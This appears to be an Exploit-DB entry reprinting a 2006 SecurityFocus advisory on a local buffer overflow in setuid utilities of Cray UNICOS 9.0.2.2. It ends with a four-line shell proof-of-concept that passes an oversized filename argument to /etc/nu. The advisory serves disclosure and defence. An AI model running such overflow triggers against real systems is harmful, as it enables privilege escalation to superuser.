Cray UNICOS /etc/nu - '-c' Option Filename Processing Local Overflow

EDB-ID:

27066


Platform:

Linux

Published:

2006-01-10

source: http://www.securityfocus.com/bid/16205/info
 
Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges.
 
Successful exploitation could result in execution of malicious machine code with superuser privileges, facilitating the complete compromise of affected computers.
 
These issues are reported in version 9.0.2.2 of UNICOS; other versions may also be affected. 

for '/etc/nu':
echo "" >> /tmp/acid
udbgen -p /tmp
echo `perl -e 'print "A"x10000'` >> /tmp/script
/etc/nu -p /tmp -c /tmp/script -a